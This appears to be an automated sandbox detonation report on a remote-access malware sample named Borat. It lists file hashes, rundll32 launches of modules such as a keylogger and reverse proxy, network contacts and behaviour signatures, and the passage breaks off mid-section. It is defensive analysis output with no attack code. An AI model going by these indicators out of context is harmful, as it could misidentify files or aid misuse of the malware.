| SHA256 | 3c49548aa77c6319d6327124e6c5238fcda4eb271a3a0bd5ed47df2b58f1de81 |
| SHA512 | 8f23ae861c54bb7d159cac7a818e5cfab000706709bcb080ce76dd5bdb4d112988d5dcec259fd2f5780ca7382f5e1b98c10534b8b0e09dbd2761da574e0d6ed2 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\1YUAUGJ4EB_29
| MD5 | 5f89355ec85e48c34836906500491d28 |
| SHA1 | d0e15eb71ef372f71d2f3bc425b494bcca46c203 |
| SHA256 | 054a323d344d6878ca1fd164607d8478f42b3fffd631d779119eab7e8868b6a7 |
| SHA512 | d48da9699d3efffbfc79ec1b1bf00309465b4317db4e237e6c093a700aabaca9af4f30e55dfe4bbcfd70fcec85cd0ebbdaa8cc65c907b80f8bbd7b185c5a48f1 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\3FY1YJKDGA_60
| MD5 | f895ed206aa5c0358b74c4b85b02c114 |
| SHA1 | 19d33664fe4df4dfd7a18b987d4472c9c3cb3135 |
| SHA256 | 4e9795a21fb7848a380dd341a8cb9c4097fad6514706802f1deb437fd54d45cc |
| SHA512 | bbfc8eee3bb9d2e1c60ce91f508b746c2f3d4bfb067ed6de04569cd3c57d860d559083b2ed5c5ed2dbc463cfab018d4f5c78b0ccedff42a2f70d6c238d994d28 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\4561C2MF3S_21
| MD5 | 5f53b2342accd9753c0cafd70db12f5a |
| SHA1 | cd5b637e3444755a6b514481f1e01eb133bdd341 |
| SHA256 | e8c8cdf46edb072d3a0532361d6f771a690b9a4abfff68fa04396e1e6eb15f4a |
| SHA512 | aa995bbe4afe9f9b86e117095c35809cb359beb035679de30db311d5e53a0d043dfa11b14ef1d8df213f28aa42aa5dc15be1887ad26374433ab347c006ed23b3 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\4RH6J0Y5GX_64
| MD5 | 75460066fe2c58bc6d68d22001d12be2 |
| SHA1 | 34770a870d8ed7949926620dde04d533e20f5f07 |
| SHA256 | c5c4dea3cacc925141ae1e51cd0580f61c946619336c7f1d15960ad561278118 |
| SHA512 | fb664e312c021a1a59c544371a4a9c9c89a77192cbf8d1d51e1dd9413e237d54834fea3361c1429c3b3b4823bb57530d1bdcecbb3bbfe3817c207002f366baa6 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\569T4H8YLF_58
| MD5 | 354b69f5c0388ef2c62c9c6c9a7ef598 |
| SHA1 | 31f23d9abc13e0c28a582e1639c6f8f853978987 |
| SHA256 | 1261855677f1f2dd6db9bfeff1ee9a60edff916bae34a76f78fba6ecde436951 |
| SHA512 | afa34dc718d83f00df0d8cd8f3c68e79d84dd846e7fd130f3044c7049adfd5592fea9d569ddb41a70be4f787d069d780778d013edaba22659417f0f539c22591 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\5PM6ULXH3Y_72
| MD5 | 63055b983f336cf355c40a2caea26e3b |
| SHA1 | f264b248d74d413b0780d79eae2321c521eff899 |
| SHA256 | 3fe036a58b919cf3cdb2d12f89f7e79b8f397c11f4f6b314657da16a2ba1839c |
| SHA512 | 33d674f14ae73a148598a15449ef152837586da784edea409bb85ef201f167a7150e50916cfb7d88ba7d721b7049b73bc1355a875a4db9ffdfdb4b1d26a66d90 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\641CU7BN97_74
| MD5 | 4828013b9af6cecdeea1bef5c3d596a5 |
| SHA1 | e1a66f24097af3a55883039ab2ff8b45759e88ba |
| SHA256 | 93a5e7b5231d413935cda09c7befa123a8922bfb129a95f236f472e26789b3a2 |
| SHA512 | e5ab2e6c1368195d842b5da108022c51f1131b059064c3e3e994c274c95de822d413f6a5d527a83efe4633c637c3dad0ebe032e3a47d5e80c51abd196940b189 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\6KQQAUKDEX_35
| MD5 | 67f8898928664135a1240484ec017468 |
| SHA1 | e8ea398cdf66a688e445704b4935f703633a1643 |
| SHA256 | b36b551149f14367f19482d142e606e4d3034509e5bb605ef14eaa084bd32158 |
| SHA512 | 1691a6b9dffcf05fa85dbbe8d982ed492dfb15d7c969bb445aff3ee636dc621398c158249c31192c5640eff940ea343249839d1ec10b9d8bded1d437d6f0b9d7 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\6SQTY03HKY_82
| MD5 | 689277a7b021c53be612eca741f83b3f |
| SHA1 | cc2719b4d8f3b3704e9d27dcfbc9aa47ca109cea |
| SHA256 | 2b33f45a25c2a9798fa9f7ca77065070f5b3a7bf5d6356d0e3a3af4a0d8d9f5b |
| SHA512 | 6eec6d4c4a202eadf97f0b05d7fd62c820dd92e477a9440e6dde00427c135a5daacf6e52edcd7956bb8bb9c5195678cb40cc3ffdc09085bdba43464eca599bb8 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\73DSD5R51P_36
| MD5 | afb0299b149134969d4ee848ef88a1ed |
| SHA1 | 6cbcc47dc989a22ca246fb61ece94972f8fdc1e3 |
| SHA256 | c74234adc1e16bae35ef6c057f4a829ba3079b5f105f6e047a985baabbc3a7fc |
| SHA512 | 874631a0299cae1b94426139a2ed3b2d13a5fce92816678c19a6e5b92740b8804e9df25caf81d8b11454b457ced59c05bb471ab66f097ff81548cd2dea0070a3 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\76DZCHCILL_23
| MD5 | 4cba435e616dc2699888d95c964e5faa |
| SHA1 | fc906ca3f5313189d34aabee0f2bba5ea3c51b90 |
| SHA256 | d2a9c6acf03bf752c437ae7dd0d77fa35f1a0b2065b0a85c70344820babe61a4 |
| SHA512 | fcf314e4d825693155efe92414f685ee271cd03d2b52b8105195fcecd16126795e55c22af9d731249ca5a25f41de88108644d1c7b922306a5ca4f21891b2f5fc |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\AH3EESUM2R_40
| MD5 | a2320e55c180105078d03a6ac4821f0c |
| SHA1 | 2d5b41d99a612c172559d3ae4b6a62eb57278e4e |
| SHA256 | 836ee87978ce7e6cb8a7a914af49f4130756d18281653b7e483af059e39d1587 |
| SHA512 | 642b49dd2853686003d3892ba064a3adb75f867aa84b798aa996828676bda038ae03a21522542923abfbfefce8aff1843fe6502bc3222831c4f487ec6fa4a82b |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\AQQH41CUR5_22
| MD5 | 995356d541ee88a8e0f08ee3798d5ff1 |
| SHA1 | 93bde5bbc77cdfe1a604d5b71a9a48392260b27d |
| SHA256 | 0debb489cb1dd5158d1d7ffe9264ecd2bbb777ff114c6d1b6b00e1ecea155050 |
| SHA512 | 4b165123528e694b0322189206564b97e3c49e8445f226026488275ab5a6b2a14a79246995d8f5256548d196f781de846b5073e9094e683ef237221c67e46499 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\CYVIPXLISZ_68
| MD5 | 1c30f9f87f1b68c98ba3179ceda7d065 |
| SHA1 | ad9ef3bd621af5c30c13ce5232c4f9a32fadf6f3 |
| SHA256 | 17bc93e23a3587fa9e9835e45146ce9a359d6bc72fa873206c3e09b03d576fe1 |
| SHA512 | 47e84fc5fcb43f333f5252b6f73910f72e66fb30381d839162f1cca4de97030b5606d32b8cb73dce6d05957e7bd355e996a06a69ac04f0e067bdeb5f432ad298 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\D9CYK0WE3M_25
| MD5 | f7f6a4399e70189a744a50b980ab66a7 |
| SHA1 | 7ee1df983292ef7965a382a470f5b0b8e4c18c06 |
| SHA256 | 0459fb13950110bd8ed1d2b30d1880f6d539e308a18d6642350fe6d6b5a3c39c |
| SHA512 | 13569c0f56eb52d544348400bab172f3efed17cadcf06e094222a426175bd5cc0309984b1f1a6bc4ec22bc6f9ba18b2bac783b71bf192eb9e2c926d85d6d4c07 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\DGCD1U241E_11
| MD5 | 3facec5b1ede82c5c1a35df14fabc57f |
| SHA1 | cc39a67d2e4804ebcd1697e149f6ab05eb2d4eb0 |
| SHA256 | 24ed5fd733693213478c4e2b98827adfb3083a41bacd05fda3923610b272a74f |
| SHA512 | 966d053e97f2c823c854d8adedeef82ef7986cef109451bb170dfa208c5241c3f52e80f086e103beed6423d10c9907cb5fb334dfb3fb799e45b5c3ad2b2d671a |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\DQ518A0D1V_61
| MD5 | 85a1138fd6603081462cf03b1506b155 |
| SHA1 | 576ff47fb7291cbd386dea0bf70a1f69cbf04070 |
| SHA256 | f40cb06197600fb7feec1fa11ed872efe8ea2bd7d679fe8a3e7d7a63f5b7a86e |
| SHA512 | 1ff6a0fc0142ae9301b915cbe16ba2eb891f9faaa8ae24621a53fc8634a7849e7f8235bde6d3feabb4b64ed86c06ccffafb434e98c94b13b910a3518a0299aab |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\EEDKR24BYJ_16
| MD5 | 81884ca53fc1d909634283a60c5e4ab2 |
| SHA1 | c2e6281447b36d2678a48b04edf6d16d63483a79 |
| SHA256 | 2ad44cf3f08f969763240ad26ee4eb083ad87886b2df382a50e6e1f42c32a2d5 |
| SHA512 | 0bb98370f42193730c3b44d2d2adbe4e3753959c29860c793093371d4ed7e7b3bb95a2236a596bb290b3c8ad62aaccb644314e3fac16830d39b1a477f858e8a6 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\F0YUJBZ0WA_44
| MD5 | 67064b895c55c6e9e79213e2d80610c6 |
| SHA1 | de585f03127b18b01bf4d2f4335e67eb50f2d3f4 |
| SHA256 | eb1935ea324499b3d3ec062e0ab221fd97c1e9421da2adc9a49ce87489373039 |
| SHA512 | 9b9ab5c82cf71b9c3a39602346ee1fe1f984bc7f960a8f812920c1d6a99632c4c8cacc1d8e5293bb70ee38cc7a73789f7e3e5b023552a4ed1cb314842783951e |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\GKOL1G8OER_18
| MD5 | 9a8cd5e0d0182ccfeeb78688f7f889eb |
| SHA1 | 79da07fdc214960cf707ee1ece5b16da6ec31e5f |
| SHA256 | 775eca9bcb25cc74021852a0725d893910afb4f53ccf137fb227157a550205ce |
| SHA512 | 78d775f1a499398dd3f17c48ed795e801f7286cc96944cc5a916ba68879c2460a91da4150a3b6eb1b058af98b5a27db7987692c5acd9c4550d35a01b68fb52b6 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JAU7ICDTJN_49
| MD5 | 0128b9d256051cf80eb6f56655532b18 |
| SHA1 | f13f2d438cbe3a44db721ca234dc364ae5cf531d |
| SHA256 | 3e4c2abb12ac5c8ab8363571e93bc96d7a61a689671217c746b807d617b38344 |
| SHA512 | fa9122d4401391deb3a8f0f218e4636cf4336636aa8ae3db93a869ac45a292dae8f6d6f6b579f8789ef015f4dd49b10a86ebe0c1d2e35022163cc2c42c220363 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JGFH8Q2XRI_51
| MD5 | d7fe52dbf80d2a20df09b1616e6b49de |
| SHA1 | bd9998d261f36392ff44ba9eee6d49c478c20947 |
| SHA256 | 9055aaba192530bef8bbb295578b41fb2af4e1702a3e5dfa86e78b5dbfa021b5 |
| SHA512 | 809540bd4b5b9ef3f5fabe3eca63c34bb9202714d2f7b85ee45b3630b55519f11466424b9ac3b53e937298aa7537222d8e2830a77f252f35458b7179ad047e0a |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JN6Z5HCX2U_83
| MD5 | f9a8f4328f88ec9ad2f12491ab5f02fc |
| SHA1 | 911d6e094353863040c453f7f84daa89e85f0cdf |
| SHA256 | dead48aafac4fdb569f1b1cc938bb6d2f870f712e48c4227a6e2fd45f15b86fe |
| SHA512 | 52f72cb9e8f640f8ba2fad99c2f5f1b1a141739ef8883a6a2790d49d84dc20e41f75f870ee3a18ca35b611c410cdb68115dd074b5ef682e11fdeee9b21610a20 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\JSYMTVSF9I_77
| MD5 | 60eec067c8876a415da67e2f03fce016 |
| SHA1 | db862665cceaea996b99b8245ac9120ea16fa53c |
| SHA256 | 7f5922c92cd33fe756cd7eb412f2208f1663fd88a9953ea2b1dc35f60b873a39 |
| SHA512 | 405ee1257a4b04027daedf63e5a23a77c8271ff53c27aacc568b375c0f033cba11129abf46b14a83c8ea14b9b59a830e5385646de9c587a45ea2c7ea17fd2d58 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\KZAZAG2SF8_30
| MD5 | c96c3a0146553be48365c73fac0bdab5 |
| SHA1 | 87510f75da8c7b8f45e26f89d7003df033860e52 |
| SHA256 | 205945a5e8333ea89d180d85cefdc7115aadce40ba4d6351854333fe8a199cf1 |
| SHA512 | bac0a5e13ec5271259ca1b39c2d65ef8a604df5c991c8d99ac68dadfc9c7b5befcef8a4459529989f1a6cc03436b4e15bf419744497c0af530d193ae501c7826 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\NRWHTGV6H5_26
| MD5 | 1dd2f6de421873901d38873a45ad6a18 |
| SHA1 | 3ded2ebca8b981701ae2fcb35dca02aef8cd1e27 |
| SHA256 | 4af496345ba17d7584db68085d0783114aa8d849c7052df4c8a5281d41d33f19 |
| SHA512 | a27eb4737d06250661dbb7491ea113f3266294438fcdd5c30c65d1f9e4277a81857f72c75515a0a04c156dd43c985bf6548b32b970fb30abcbac15b682b0fb90 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\P37BVKJFKB_27
| MD5 | 3be9e8907b2607e6373320fdc5df4434 |
| SHA1 | 1e94d57ba7f4d651bfb5242153bd08410afd9b00 |
| SHA256 | ce5ed73abb70ad88389bcb37f78c13819ab3ef9b275f8fef78fac3a46a2216d1 |
| SHA512 | 75c7c315bfde989573f7bf0c69f4ebdbfc484dd8501d58fe8cd9f028d31d63337e92f2ceb495e8669e0d60ea7e0ffa0d838458efad71e7b97be22a51a9c52715 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\PRXGEA1WGI_10
| MD5 | 8be9928e503e0f93614896a73ab8d23e |
| SHA1 | c2f350c96bf343c86fd056199e5b2faa0d93dbed |
| SHA256 | d4e417b7da9e5bc434b1067dbaa903fbca9b20b42f09cba808cf70d9b569f867 |
| SHA512 | da08e603ba0d2bf1ae0866b96716ada612f6b321e8d1032f13ab450e57d984b9189f55bf5c8aa7a941287f3a25f2fd993a0bd0c92da605215e33a2687eb8ed17 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\Q3QXXREDJL_53
| MD5 | a69402a91297d07c38fa6852709e073f |
| SHA1 | 13673232125e116038532c515ea3e3d86c212c49 |
| SHA256 | eb57004a4cd250962d965a0c8261fe4dcb1720348b540aa3ce9dc920c5e2629d |
| SHA512 | 0ebf5369a85b4d6736a10f6a288ac6c872681b2e092b21eb3db38901661948c40d080eedc331ba00c2cfb0263cdf2998a917fbfe18d52e9fc3ae37bb32412430 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AppData\CacheStorage\Files4\Q3S1G8C0_1\YF2MB6Y0_2\TGAP7LYUU2_85
| MD5 | 971787f7730a9241f125f55483a61aac |
| SHA1 | dc67125dd253b9a386a69a65aa34028a60342dd9 |
| SHA256 | dcaa4bf51977b03ebfe1b86f59c45f16718f60dcf65d99d4f8ef0ba05593c6f5 |
| SHA512 | 560a4dfc95f971d9f278ca6eeef9bc4f7717ce42e9ac2a7f8beae320cd46d3f4868eef3ca8ae29f90b1d4b15932a2f8f163aec4abf3bfcc07d5c02fd1cebdd1e |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4f0e67c9-da3b-4330-9bd0-cbaa1891c14f}\0.1.filtertrie.intermediate.txt
| MD5 | 33223e636bdbf373ec6e9bd340683603 |
| SHA1 | 5782664267e633f93eb2b64d98b87d9ebbced001 |
| SHA256 | fabfc6577098bdd4ab1b9be27afac35f2e1c0617d7232ad2158d4bb6b905ce46 |
| SHA512 | a2a7230d2cb5430a6d18316548d6b790b499a966dd97a360800510f40cd6fa678f8932550b26c05890e4c3564a1179e6fa3d8be6a6451c249776721e08862a74 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{4f0e67c9-da3b-4330-9bd0-cbaa1891c14f}\0.2.filtertrie.intermediate.txt
| MD5 | 53e46bf98975ee755ea813a3c4dcb9ff |
| SHA1 | b940282c660017809856ab5d83a4dbd4dd3770a8 |
| SHA256 | 09d87f64047107711aac984fecc12f7974a00af85edbd3153cc67a0fd25a3395 |
| SHA512 | 2dc530b2c3ff1f1af7079f9bad33f97f0da1e9bfe0836ba17657754ef4e892e3471d322f9c1cd1beceab8f36eb128efdd0bd5474f2f4be9ecd03fac2d7488550 |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\File Explorer.lnk
| MD5 | df284305a0949862486d213d7cb0b105 |
| SHA1 | 90b63d12818b5f0ab4c6fa2a358d2f60c715e466 |
| SHA256 | d0d3fc48ac1bfb0763fa78c02a561b72521bb57eeef61e0ac6c44246155c0091 |
| SHA512 | dd0f97c073d8a23c5d1d0068a5e4529e5af89d6f371cb3ab3dd49f0ea7d2d44aff7a2986ab3e7d2984299049f59243a3bbedf8c97c0fcf9578356a879a377e81 |
C:\Users\Admin\Desktop\DECRYPT.exe
| MD5 | ee71b8c97fe4bdfd9008a38af3ae2e01 |
| SHA1 | ee9861512b832ce5678d29e61a0eeced21aa7fdd |
| SHA256 | cd9995be15284735b939cc68dc2e5d0caa55da89216cb363cf0c2557a1b208e8 |
| SHA512 | aa0e8520f3120d1390b6559bbeb5cdd376b24003708bc7f60890ccdc01e20c51953475ecbb503729c06ee0e2e2d3cdfca8d209b753312a3daf2a1ffad8bd42db |
memory/1864-14856-0x00000000008C0000-0x00000000008D6000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | ea872f4a99058e9bd5ced3468da82a68 |
| SHA1 | f4a2d8b360f9ed999601b108034e2aeab0046e98 |
| SHA256 | 284d703b04635c777fd2e1c7b75ea0166b633ffdfac6eb8fcbacfda122999aca |
| SHA512 | 5537bbee92b48856197cea5fd6b4dc7c9abd09fd074ac848625b5dcef0326dc9a97ce4a81e4c3bafcb4ef8bcb6690de5a05063f933f04379fc22edebf0565e0d |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt
| MD5 | 766f5efd9efca73b6dfd0fb3d648639f |
| SHA1 | 71928a29c3affb9715d92542ef4cf3472e7931fe |
| SHA256 | 9111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc |
| SHA512 | 1d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 9a32be1451abc639065e9bb7f7695ff7 |
| SHA1 | 65a4401dd714cde67d4a0feedf12901ce5ccdde8 |
| SHA256 | 89c2b8a03fb43cd0f1f40f260a1de97c9bb4b648d976474bf80a9808c3063580 |
| SHA512 | 363e87a13de0b2bf1d5b60d17c6767670ac6431580052070c602b2a850e61efa36dde40700281c2cb6d41ce054aec267007eecab66eb09c8a21bf1440032f806 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240508-en
Max time kernel
1796s
Max time network
1800s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Extra.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | tcp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:13
Platform
win11-20240508-en
Max time kernel
1740s
Max time network
1750s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Options.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:33
Platform
win11-20240611-en
Max time kernel
1525s
Max time network
1499s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\ReverseProxy.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240611-en
Max time kernel
1476s
Max time network
1491s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Audio.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240419-en
Max time kernel
451s
Max time network
1173s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\FileManager.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240611-en
Max time kernel
1384s
Max time network
1177s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\Information.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| AU | 40.79.173.41:443 | tcp | |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:11
Platform
win11-20240611-en
Max time kernel
1483s
Max time network
1497s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Borat\bin\Keylogger.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Borat\bin\Keylogger.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Borat\bin\Keylogger.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Borat\bin\Keylogger.exe
"C:\Users\Admin\AppData\Local\Temp\Borat\bin\Keylogger.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
memory/1600-0-0x00007FF871ED3000-0x00007FF871ED5000-memory.dmp
memory/1600-1-0x0000000000530000-0x0000000000538000-memory.dmp
memory/1600-2-0x00007FF871ED0000-0x00007FF872992000-memory.dmp
memory/1600-3-0x00007FF871ED3000-0x00007FF871ED5000-memory.dmp
memory/1600-4-0x00007FF871ED0000-0x00007FF872992000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:13
Platform
win11-20240508-en
Max time kernel
453s
Max time network
1175s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Borat\bin\MessagePackLib.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-29 18:40
Reported
2024-06-29 19:13
Platform
win11-20240508-en
Max time kernel
1765s
Max time network
1775s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\Winword.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
